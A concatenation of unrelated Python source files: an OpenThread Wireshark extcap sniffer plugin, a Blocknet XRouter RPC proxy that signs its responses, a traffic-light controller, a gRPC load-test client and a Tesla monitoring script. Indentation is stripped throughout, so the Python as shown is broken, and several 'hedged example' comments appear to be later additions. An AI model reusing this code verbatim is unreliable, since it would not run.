if len(unknown) > 0:
parser.exit('Sniffer %d unknown arguments given: %s' % (len(unknown), unknown))
if len(sys.argv) <= 1:
parser.print_help()
parser.exit('No arguments given!')
if not args.extcap_interfaces and args.extcap_interface is None:
parser.exit('An interface must be provided or the selection must be displayed')
if args.extcap_interfaces:
extcap_interfaces()
sys.exit(0)
if args.extcap_config:
extcap_config(args.extcap_interface, '', extcap_version)
elif args.extcap_dlts:
extcap_dlts(args.extcap_interface)
elif args.capture:
if args.fifo is None:
parser.exit('The fifo must be provided to capture')
try:
extcap_capture(args.extcap_interface, args.fifo, args.extcap_control_in, args.extcap_control_out, args.channel, args.tap)
except KeyboardInterrupt:
pass
except Exception as e:
logging.exception(e)
parser.exit('ERROR_INTERNAL')
else:
parser.print_help()
parser.exit('ERROR_USAGE')
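# --- Hedged example session (not part of the original plugin) ---------------
# Wireshark drives this extcap plugin through a small handshake. Assuming a
# single sniffer was detected on /dev/ttyACM0 at 115200 baud (device path,
# baudrate, fifo path and channel below are illustrative), the calls and
# outputs would look roughly like:
#
#   ./extcap_ot.py --extcap-interfaces
#       extcap {version=1.0.0}{display=OpenThread Sniffer}{help=https://github.com/openthread/pyspinel}
#       interface {value=/dev/ttyACM0:115200}{display=OpenThread Sniffer}
#
#   ./extcap_ot.py --extcap-interface /dev/ttyACM0:115200 --extcap-dlts
#       dlt {number=195}{name=IEEE802_15_4_WITHFCS}{display=IEEE 802.15.4 with FCS}
#       dlt {number=283}{name=IEEE802_15_4_TAP}{display=IEEE 802.15.4 TAP}
#
#   ./extcap_ot.py --capture --extcap-interface /dev/ttyACM0:115200 \
#       --fifo /tmp/wireshark_extcap_fifo --channel 15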
|
test_GUI_threading.py
|
from MultiVehicleEnv.GUI import GUI
import argparse
import time
import threading
parser = argparse.ArgumentParser(description="GUI for Multi-VehicleEnv")
parser.add_argument('--gui-port',type=str,default='/dev/shm/gui_port')
parser.add_argument('--fps',type=int,default=24)
args = parser.parse_args()
GUI_instance = GUI(port_type='file', gui_port=args.gui_port, fps=args.fps)
GUI_t = threading.Thread(target=GUI_instance._render_target)
GUI_t.daemon = True
GUI_t.start()
GUI_t.join()
|
xrproxy.py
|
# Copyright (c) 2019-2020 The Blocknet developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
#!/usr/bin/env python3
import bitcoin.core
import bitcoin.signmessage
import bitcoin.wallet
import json
import requests
import threading
import uwsgi
from requests.auth import HTTPDigestAuth
# import pydevd_pycharm
# pydevd_pycharm.settrace('localhost', port=4444, stdoutToServer=True, stderrToServer=True)
def application(env: dict, start_response):
# Select chain
chain = uwsgi.opt.get('BLOCKNET_CHAIN', b'mainnet').decode('utf8').strip()
try:
bitcoin.SelectParams(chain)
except ValueError as e:
print('Failed to parse BLOCKNET_CHAIN parameter, defaulting to mainnet: ' + getattr(e, 'message', repr(e)))
bitcoin.SelectParams('mainnet')
snodekey = bitcoin.wallet.CKey
# check snode key
snodekey_raw = uwsgi.opt.get('SERVICENODE_PRIVKEY', b'').decode('utf8').strip()
if not snodekey_raw:
return send_response({
'code': 1002,
'error': 'Internal Server Error: bad service node key'
}, snodekey, start_response)
try:
snodekey = bitcoin.wallet.CBitcoinSecret(snodekey_raw)
except bitcoin.wallet.CBitcoinSecretError as e:
print(getattr(e, 'message', repr(e)))
return send_response({
'code': 1002,
'error': 'Internal Server Error: bad service node key'
}, snodekey, start_response)
# parse the request path
request_path = str(env.get('PATH_INFO'))
paths = request_path.split('/')
if len(paths) > 1:
del paths[0]
if len(paths) < 2:
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ', the path must be in the format '
'/xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
elif len(paths) > 3:
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ', the path must have a namespace, a method, '
'and a token, for example: /xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
namesp = paths[0]
token = ''
xrfunc = ''
if namesp == 'xr':
token = paths[1]
xrfunc = paths[2]
elif namesp == 'xrs':
xrfunc = paths[1]
if not namesp or not xrfunc or (namesp == 'xr' and not token):
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ', the path must have a namespace, a method, '
'and a token, for example: /xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
# if xrouter plugin, set token to xr func name
if namesp == 'xrs':
token = xrfunc
# if payment tx exists, process it in background
payment_tx = str(env.get('HTTP_XR_PAYMENT', ''))
should_handle = uwsgi.opt.get('HANDLE_PAYMENTS', b'true').decode('utf8').lower()
if should_handle == 'true' or should_handle == '1':
payment_enforcement = uwsgi.opt.get('HANDLE_PAYMENTS_ENFORCE', b'false').decode('utf8').lower()
if payment_enforcement == 'true' or payment_enforcement == '1':
if payment_tx == '' or not handle_payment(payment_tx, env):
return send_response({
'code': 1028,
'error': 'Bad request: bad or insufficient fee for ' + xrfunc + ' for token ' + token
}, snodekey, start_response)
else:
hp_thread = threading.Thread(target=handle_payment, args=(payment_tx, env))
hp_thread.start()
try:
response = call_xrfunc(namesp, token, xrfunc, env)
return send_response(response, snodekey, start_response)
except ValueError as e:
return send_response({
'code': 1002,
'error': 'Internal Server Error: failed to call method ' + xrfunc + ' for token ' + token
+ ' : ' + getattr(e, 'message', repr(e))
}, snodekey, start_response)
except:
return send_response({
'code': 1002,
'error': 'Internal Server Error: failed to call method ' + xrfunc + ' for token ' + token
}, snodekey, start_response)
def call_xrfunc(namesp: str, token: str, xrfunc: str, env: dict):
is_xrouter_plugin = namesp == 'xrs'
# obtain host info
rpchost = uwsgi.opt.get('RPC_' + token + '_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('RPC_' + token + '_PORT', b'').decode('utf8')
rpcuser = uwsgi.opt.get('RPC_' + token + '_USER', b'').decode('utf8')
rpcpass = uwsgi.opt.get('RPC_' + token + '_PASS', b'').decode('utf8')
rpcver = uwsgi.opt.get('RPC_' + token + '_VER', b'1.0').decode('utf8')
rpcmethod = ''
try:
request_body_size = int(env.get('CONTENT_LENGTH', 0))
except ValueError:
request_body_size = 0
params = []
if request_body_size > 0:
request_body = env.get('wsgi.input').read(request_body_size)
if request_body != b'\n':
try:
data = request_body.decode('utf8')
params += json.loads(data)
except:
pass
if is_xrouter_plugin:
if 'RPC_' + token + '_METHOD' in uwsgi.opt:
rpcmethod = uwsgi.opt.get('RPC_' + token + '_METHOD', b'').decode('utf8')
elif 'URL_' + token + '_HOSTIP' in uwsgi.opt:
return call_url(xrfunc, params, env)
if not rpchost or not rpcport or not rpcuser or not rpcpass or (is_xrouter_plugin and not rpcmethod):
return {
'code': 1002,
'error': 'Internal Server Error: bad proxy configuration for token ' + token
}
# resolve the rpc name from the supplied xrouter call
rpc_method = rpcmethod.lower() if is_xrouter_plugin else xr_to_rpc(token, xrfunc)
if not rpc_method:
return {
'code': 1031,
'error': 'Unsupported call ' + xrfunc + ' for token ' + token
}
rpcurl = 'http://' + rpcuser + ':' + rpcpass + '@' + rpchost + ':' + rpcport
if rpcuser == '' and rpcpass == '': # if no rpc credentials
rpcurl = 'http://' + rpchost + ':' + rpcport
headers = {'Content-Type': 'application/json'}
l_xr_method = xrfunc.lower()
l_token = token.lower()
if l_token == 'eth' or l_token == 'etc':
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = parse_result(json.loads(res.content))
count = int(response, 16)
return count
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblockhash':
if isinstance(params[0], int):
params = [hex(params[0]), False]
elif isinstance(params[0], str) and not params[0].startswith('0x'):
try: # first check if int
i = int(params[0])
params = [hex(i), False]
except ValueError:
params = ['0x' + params[0], False]
else:
params = [params[0], False]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = json.loads(res.content)
block_hash = str(response['result']['hash'])
return block_hash
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblock':
params = [params[0], False]
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
parsed_id: any
rpc_method2 = rpc_method
if isinstance(b_id, int):
parsed_id = hex(b_id)
if l_xr_method == 'xrgetblocks':
rpc_method2 = 'eth_getBlockByNumber'
else:
parsed_id = b_id
params2 = [parsed_id, False]
if l_xr_method == 'xrgettransactions':
params2 = [parsed_id] # transactions don't support a 2nd parameter
payload = json.dumps({
'id': 1,
'method': rpc_method2,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
pass
if l_xr_method == 'xrsendtransaction':
pass
elif l_token == 'neo':
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
pass
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
params = [params[0], 1]
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
params2 = [b_id]
if l_xr_method == 'xrgettransactions' or l_xr_method == 'xrgetblocks':
params2 += [1]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
params = [params[0], 1]
if l_xr_method == 'xrsendtransaction':
pass
elif l_token == 'xmr':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/json_rpc'
auth = HTTPDigestAuth(rpcuser,rpcpass)
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
try:
response = json.loads(res.content)
count = str(response['result']['count'])
return count
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': {'hash':params[0]},
'jsonrpc': rpcver
})
if l_xr_method == 'xrgetblocks': # iterate over all ids
response = []
for b_id in params:
params2 = b_id
if l_xr_method == 'xrgetblocks':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': {'hash':params2},
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/get_transactions'
payload = json.dumps({
'txs_hashes': [params[0]],
'decode_as_json': True
})
if l_xr_method == 'xrgettransactions': # iterate over all ids
rpcurl = 'http://' + rpchost + ':' + rpcport + '/get_transactions'
response = []
for b_id in params:
params2 = b_id
if l_xr_method == 'xrgettransactions':
payload = json.dumps({
'txs_hashes': [params2],
'decode_as_json': True
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrsendtransaction':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/send_raw_transaction'
payload = json.dumps({
'tx_as_hex': params[0],
'do_not_relay': False
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
try:
response = parse_result(json.loads(res.content))
return response
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
else:
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
pass
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
pass
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
params2 = [b_id]
if l_xr_method == 'xrgettransactions':
params2 += [1]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
params = [params[0], 1]
if l_xr_method == 'xrsendtransaction':
pass
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = parse_result(json.loads(res.content))
return response
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
def call_url(xrfunc: str, params: any, env: dict):
rpchost = uwsgi.opt.get('URL_' + xrfunc + '_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('URL_' + xrfunc + '_PORT', b'').decode('utf8')
rpcurl = 'http://' + rpchost + ':' + rpcport + str(env.get('PATH_INFO', b''))
headers = {
'Content-Type': 'application/json',
'XR-Pubkey': str(env.get('HTTP_XR_PUBKEY', b'')),
'XR-Signature': str(env.get('HTTP_XR_SIGNATURE', b'')),
'XR-Payment': str(env.get('HTTP_XR_PAYMENT', b'')),
}
payload = '' if len(params) == 0 else json.dumps(params)
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = json.loads(res.content)
return parse_result(response)
except:
return res.content.decode('utf8')
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc
}
def handle_payment(payment_tx: str, env: dict):
rpchost = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_PORT', b'').decode('utf8')
rpcuser = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_USER', b'').decode('utf8')
rpcpass = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_PASS', b'').decode('utf8')
rpcver = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_VER', b'1.0').decode('utf8')
rpcurl = 'http://' + rpcuser + ':' + rpcpass + '@' + rpchost + ':' + rpcport
if rpcuser == '' and rpcpass == '': # if no rpc credentials
rpcurl = 'http://' + rpchost + ':' + rpcport
# client pubkey
client_pubkey = str(env.get('HTTP_XR_PUBKEY', b''))
params = [payment_tx]
headers = {'Content-Type': 'application/json'}
payload = json.dumps({
'id': 1,
'method': 'sendrawtransaction',
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
enforce = uwsgi.opt.get('HANDLE_PAYMENTS_ENFORCE', b'false').decode('utf8')
# look for valid tx hash in response otherwise fail the check
if enforce == 'true' or enforce == '1':
payment_response = res.content.decode('utf8')
if len(payment_response) != 32 or 'error' in payment_response:
print('Failed to process payment from client: ' + client_pubkey
+ ' Error: ' + payment_response + ' tx hex: ' + payment_tx)
return False
print('Successfully processed payment from client: ' + client_pubkey + ' BLOCK tx: ' + payment_tx)
return True
except:
print('Failed to process payment from client: ' + client_pubkey + ' BLOCK tx: ' + payment_tx)
return False
def parse_result(res: any):
if 'result' in res and res['result']:
return res['result']
else:
return res
def xr_to_rpc(token: str, xr_func: str):
l_xr_method = xr_func.lower()
l_token = token.lower()
if l_token == 'eth' or l_token == 'etc':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'eth_blockNumber'
if l_xr_method == 'xrgetblockhash': return 'eth_getBlockByNumber'
if l_xr_method == 'xrgetblock': return 'eth_getBlockByHash'
if l_xr_method == 'xrgetblocks': return 'eth_getBlockByHash'
if l_xr_method == 'xrgettransaction': return 'eth_getTransactionByHash'
if l_xr_method == 'xrgettransactions': return 'eth_getTransactionByHash'
if l_xr_method == 'xrsendtransaction': return 'eth_sendRawTransaction'
elif l_token == 'neo':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'getblockcount'
if l_xr_method == 'xrgetblockhash': return 'getblockhash'
if l_xr_method == 'xrgetblock': return 'getblock'
if l_xr_method == 'xrgetblocks': return 'getblock'
if l_xr_method == 'xrgettransaction': return 'getrawtransaction'
if l_xr_method == 'xrgettransactions': return 'getrawtransaction'
if l_xr_method == 'xrsendtransaction': return 'sendrawtransaction'
elif l_token == 'xmr':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'get_block_count'
if l_xr_method == 'xrgetblockhash': return 'on_get_block_hash'
if l_xr_method == 'xrgetblock': return 'get_block'
if l_xr_method == 'xrgetblocks': return 'get_block'
if l_xr_method == 'xrgettransaction': return 'get_transactions'
if l_xr_method == 'xrgettransactions': return 'get_transactions'
if l_xr_method == 'xrsendtransaction': return 'send_raw_transaction'
else:
if l_xr_method == 'xrdecoderawtransaction': return 'decoderawtransaction'
if l_xr_method == 'xrgetblockcount': return 'getblockcount'
if l_xr_method == 'xrgetblockhash': return 'getblockhash'
if l_xr_method == 'xrgetblock': return 'getblock'
if l_xr_method == 'xrgetblocks': return 'getblock'
if l_xr_method == 'xrgettransaction': return 'getrawtransaction'
if l_xr_method == 'xrgettransactions': return 'getrawtransaction'
if l_xr_method == 'xrsendtransaction': return 'sendrawtransaction'
return ''
def send_response(result: any, snodekey: bitcoin.wallet.CKey, start_response):
headers = [('Content-Type', 'application/json')]
res_data = result.encode('utf8') if isinstance(result, str) else json.dumps(result).encode('utf8')
# sign the result data if the servicenode key is valid
try:
res_hash = bitcoin.core.Hash(bitcoin.core.serialize.BytesSerializer.serialize(res_data))
sig, i = snodekey.sign_compact(res_hash)
meta = 27 + i
if snodekey.is_compressed:
meta += 4
headers += [('XR-Pubkey', snodekey.pub.hex()),
('XR-Signature', bitcoin.core.b2x(bitcoin.signmessage._bchr(meta) + sig))]
except Exception as e:
print('Unknown signing error: ' + getattr(e, 'message', repr(e)))
start_response('200 OK', headers)
return res_data
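# --- Hedged usage sketch (not part of the original proxy) -------------------
# Quick illustration of how an XRouter request path maps onto a backend RPC
# method via xr_to_rpc(). The path splitting mirrors application() above; the
# example path, token and helper name are hypothetical.
def _example_resolve(request_path='/xr/BLOCK/xrGetBlockCount'):
    namesp, token, xrfunc = [p for p in request_path.split('/') if p]
    # For the 'xr' namespace the token selects the chain; 'BLOCK' falls through
    # to the generic Bitcoin-style mapping, so this resolves to 'getblockcount'.
    return namesp, token, xr_to_rpc(token, xrfunc)
# _example_resolve() -> ('xr', 'BLOCK', 'getblockcount')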
|
main.py
|
"""
OVERVIEW:\n
Making a trial program for assigning the red lights of the\n
according to the inputs made by the ML division. \n\n
THEORY:
assign green light to the one which has the greatest time in\n
the array inputted\n
\n
INPUT:\n
a numpy array from ML file that contains the time required to\n
clean the intersections\n
\n
WARNING:\n
Training is turned off. Turn it on by increasing the trainLimit\n
in ml_classes file in ML folder
"""
import numpy as np
from classes import Traffic_Light
from functions import loop_exiter, traffic_light_chooser, all_inactive_converter, time_updater, emergency_detector, get_all_traffic_times
from time import sleep
import threading
from sys import path
from os import getcwd
# this flag indicates whether the program is running in trial/debug mode
DEBUG = True
# change these manually to use different default display images
img_dir = 'http://127.0.0.1:8000/1.jpg'
img_dir2 = 'http://127.0.0.1:8000/2.jpg'
img_dir3 = 'http://127.0.0.1:8000/3.jpg'
img_dir4 = 'http://127.0.0.1:8000/4.jpg'
# traffic_time contains all the time values
# taking random values right now for testing
# emergency variable
emergency_loop = False
# variable for exiting the full program
exit_program = False
# defining the traffic lights; actual links to the images have to be added here
light_1 = Traffic_Light( 0, img_dir)
light_2 = Traffic_Light( 1, img_dir2)
light_3 = Traffic_Light( 2, img_dir3)
light_4 = Traffic_Light( 3, img_dir4)
intersection = [ light_1, light_2, light_3, light_4]
# getting the initial times by running the IP part
time_updater( intersection, ip_time= DEBUG) # IP call
# making a loop that will always execute handling the operation
while( 1):
while( not emergency_loop):
# breaking loop if letter q is pressed and held
if loop_exiter():
exit_program = True
break
if DEBUG:
print( 'times are: ', get_all_traffic_times( intersection))
# checking if all are inactive
print( all_inactive_converter( intersection, DEBUG))
# choosing the light that has max time remaining and is active
chosen_id = traffic_light_chooser( intersection)
chosen_traffic_light = intersection[chosen_id]
objectsAtStart = chosen_traffic_light.objectsArray
greenTime = chosen_traffic_light.green_time
# showing the lights for the chosen traffic light
light_thread = threading.Thread( target= chosen_traffic_light.show_light, args= [intersection])
light_thread.start()
# updating the values in a separate thread so the loop stays free to handle emergencies
update_thread = threading.Thread( target= time_updater, args= [ intersection, True, chosen_id]) # IP call
update_thread.start()
# checking for emergency vehicles while showing lights
# for now pressing button on website causes emergency
if emergency_detector( greenTime, intersection):
emergency_loop = True
break
"""
here we need to change for real values
"""
# ending the light and preparing for next round of the green lights
light_thread.join()
update_thread.join()
# goes into training only if limit is not passed
if chosen_traffic_light.isTraining:
train_thread = threading.Thread( target= chosen_traffic_light.light_trainer, args= [objectsAtStart]) # IP call
train_thread.start()
if DEBUG:
print( 'loop finished')
print( '\n\n')
if exit_program:
print( 'Exiting Program')
break
#________________________________________________________________________________________
# in emergency conditions this thing runs
if DEBUG:
print( 'emergency condition applied')
# changing current green traffic light to yellow for 2 seconds
chosen_traffic_light.change_color( 'yellow', from_emergency= True)
sleep( 2)
#changing all colors to red
print( '\n\nchanging all colors to red')
for tl in intersection:
tl.change_color( 'red')
# extracting the light number
for indx, tl in enumerate( intersection):
if tl.emergency:
emer_id = indx
print( 'emergency at light {}'.format( emer_id))
# choosing the light that has emergency
emer_traffic_light = intersection[emer_id]
# giving input to the chosen light to stop its process
chosen_traffic_light.was_emergency = True
print( 'changing light {} to green-emergency'.format( emer_id))
emer_traffic_light.change_color( 'green', emergency_loop)
emer_timer = 0
# checking for emergency after every second
while( emergency_loop):
sleep( 1)
emer_timer += 1
emergency_loop = emer_traffic_light.emergency
ip_thread = threading.Thread( target= time_updater, args=[intersection])
ip_thread.start()
print( 'Emergency for {} seconds'.format( emer_timer))
print( 'changing light {} to yellow for 5 seconds-emergency'.format( emer_id))
emer_traffic_light.change_color( 'yellow', True)
sleep( 5)
print( 'changing light {} to red-emergency'.format( emer_id))
emer_traffic_light.change_color( 'red', True)
print( 'resetting the traffic lights...')
print( all_inactive_converter( intersection, DEBUG, emergency= True))
emergency_loop = False
ip_thread.join()
print( '\n\n')
|
auto_pilot_frontend_client.py
|
import base64
import os
import time
from concurrent import futures
import threading
import argparse
import sys
import datetime
import random
from multiprocessing import Process, Queue, Lock
from google.protobuf.timestamp_pb2 import Timestamp
import grpc
#from hams_admin.grpcclient import grpc_client
from hams_admin.rpc import (management_pb2, management_pb2_grpc, model_pb2,
model_pb2_grpc, prediction_pb2,
prediction_pb2_grpc)
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-9s) %(message)s',)
def oursystem(ip, port, inputt):
## IP is frontend ip, Port is 22222
channel = grpc.insecure_channel('%s:%s'%(ip, port))
stub = prediction_pb2_grpc.ProxyServerStub(channel)
response = stub.downstream(prediction_pb2.request(input_ = model_pb2.input(inputType = 'string', inputStream = inputt)))
return response.status
def withoutproxy(ip, port, inputt):
## IP is the first container's ip, Port is 22222
time.sleep(1)
return "withoutproxy"
def hams(ip, port, inputt):
## IP is raft-hams leader's ip, Port is ignored
time.sleep(1)
return "hams"
# Producer function that places data on the Queue
def producer(queue, lock, ip, port, inputt_list, func):
# Synchronize access to the console
with lock:
print('Starting worker => {}'.format(os.getpid()))
# Query and return output on the Queue
for inputt in inputt_list:
#time.sleep(random.randint(0, 10))
output = func(ip, port, inputt)
#queue.put(output)
with lock:
print("Input {} returns Output: {}".format(inputt, output))
# Synchronize access to the console
with lock:
print('Worker {} exiting...'.format(os.getpid()))
# Currently no need
# The consumer function takes data off of the Queue
def consumer(queue, lock):
# Synchronize access to the console
with lock:
print('Starting consumer => {}'.format(os.getpid()))
# Run indefinitely
while True:
time.sleep(random.randint(0, 2))
# If the queue is empty, queue.get() will block until the queue has data
output = queue.get()
# Synchronize access to the console
with lock:
print('{} got {}'.format(os.getpid(), output))
def main():
parser = argparse.ArgumentParser(description='concurrent client')
parser.add_argument('--worker', nargs=1, type=int, help="Worker num")
parser.add_argument('--ip', nargs=1, type=str, help="Ip address of your query frontend")
parser.add_argument('--port', nargs=1, type=str, help="Port of your query frontend, for Clipper, put an arbitrary INT")
parser.add_argument('--system', nargs=1, type=str, help="System name: oursystem/withoutproxy/hams")
args = parser.parse_args()
# Generate your inputt list here
inputt_total = [str(i) + "***7***7" for i in range(100)]
# Get configuration
work_num = args.worker[0]
ip = args.ip[0]
port = args.port[0]
system = args.system[0]
# Create the Queue object
queue = Queue()
# Create a lock object to synchronize resource access
lock = Lock()
producers = []
consumers = []
thismodule = sys.modules[__name__]
for i in range(work_num):
# Slice the input_total to $work_num lists
inputt_list = inputt_total[i::work_num]
# Create our producer processes by passing the producer function and its arguments
producers.append(Process(target=producer, args=(queue, lock, ip, port, inputt_list, getattr(thismodule, system))))
# Create consumer processes
#for i in range(work_num):
# p = Process(target=consumer, args=(queue, lock))
# This is critical! The consumer function has an infinite loop
# Which means it will never exit unless we set daemon to true
# p.daemon = True
# consumers.append(p)
# Start the producers and consumer
# The Python VM will launch new independent processes for each Process object
start = time.time()
for p in producers:
p.start()
#for c in consumers:
# c.start()
# Like threading, we have a join() method that synchronizes our program
for p in producers:
p.join()
end = time.time()
print('Finished %d requests with time:'%(len(inputt_total)))
print(end-start)
print('Parent process exiting...')
if __name__ == '__main__':
main()
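# --- Hedged usage example (shown as a comment, values are illustrative) -----
# Assuming a query frontend listening on 127.0.0.1:22222, four worker
# processes could be launched against the gRPC proxy like this:
#   python auto_pilot_frontend_client.py --worker 4 --ip 127.0.0.1 \
#       --port 22222 --system oursystem
# Each worker receives every 4th element of the generated input list and
# prints the per-request status returned by the downstream() RPC.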
|
teslaWatch.py
|
#!/usr/bin/env python3
'''
################################################################################
#
# Script to watch for Tesla state changes
#
# This is intended to run in the cloud; an Android front-end will manage the
# fences, and this script will issue notifications to the mobile device.
#
# N.B.
# * Values given on command line override those in the config file.
# * If no DB directory path is given (in either the config file or on the
# command line) then nothing is logged to the DB. Otherwise, all data
# collected from the Tesla API is logged in a sqlite3 DB -- one file
# for each car in the given DB directory, named with each car's VIN.
#
################################################################################
'''
#### TODO add logging
import argparse
import collections
import json
import logging
import multiprocessing as mp
import os
import queue
import random
import signal
import sys
import time
import yaml
import teslajson
from notifier import Notifier
from regions import Region
from teslaCar import Car
import teslaDB
from teslawatch import fatalError, dictMerge
from tracker import Tracker
'''
TODO:
* convert all files over to use 'logging'
'''
# default path to configs file
DEF_CONFIGS_FILE = "./.teslas.yml"
# default path to DB schema file
DEF_SCHEMA_FILE = "./dbSchema.yml"
DEF_LOG_LEVEL = "WARNING"
# Default
# Includes intervals between samples of the Tesla API (quantized to integer
# multiples of the min time), given in units of seconds, and thresholds
#### FIXME
#### TODO make more rational choices for these values
DEF_SETTINGS = {
'intervals': {
'chargeState': 5 * 60,
'climateSettings': 10 * 60,
'driveState': 1,
'guiSettings': 3 * 60,
'vehicleState': 60
},
'thresholds': {
'distance': 0
}
}
def commandInterpreter(trackers, cmds, resps):
''' TBD
'''
#### TODO implement cmd interpreter and send cmds to running trackers to restart them and change their events
cmd = ""
while True:
line = input("> ")
words = line.split(' ')
cmd = words[0].lower().strip()
args = words[1:]
if cmd == 'l':
print(f"Tracking: {trackers.keys()}")
if cmd == 'p':
vin = args[0]
if vin not in trackers:
print(f"ERROR: VIN '{vin}' not being tracked")
else:
print(dumpQueue(resps[vin]))
if cmd == 'r':
pass
if cmd == 's':
vin = args[0]
if vin not in trackers:
print(f"ERROR: VIN '{vin}' not being tracked")
else:
cmds[vin].put("STOP")
#### TODO reread trackers
elif cmd == 'q':
break
elif cmd == '?' or cmd == 'h':
print("Help:")
print(" h: print this help message")
print(" l: show VINs of cars being tracked")
print(" p <vin>: print output from car given by <vin>")
print(" r: stop and restart all trackers, re-reading the configs file")
print(" s <vin>: stop tracking the car given by <vin>")
print(" q: quit")
print(" ?: print this help message")
return
def dumpQueue(q):
''' Return the contents of a given message queue.
'''
result = []
try:
msg = q.get(True, 0.1)
while msg:
result.append(msg)
msg = q.get(True, 0.1)
except queue.Empty:
pass
return result
def run(options):
try:
conn = teslajson.Connection(options.user, options.passwd)
except Exception as e:
fatalError(f"Failed to connect: {e}")
logging.info(f"Connection: {conn}")
logging.info(f"Number of vehicles: {len(conn.vehicles)}")
if options.verbose > 1:
n = 1
for v in conn.vehicles:
print(f"Vehicle #{n}:", end='')
json.dump(v, sys.stdout, indent=4, sort_keys=True)
print("")
n += 1
carVINs = opts.confs['cars'].keys()
if opts.VIN:
carVINs = [opts.VIN]
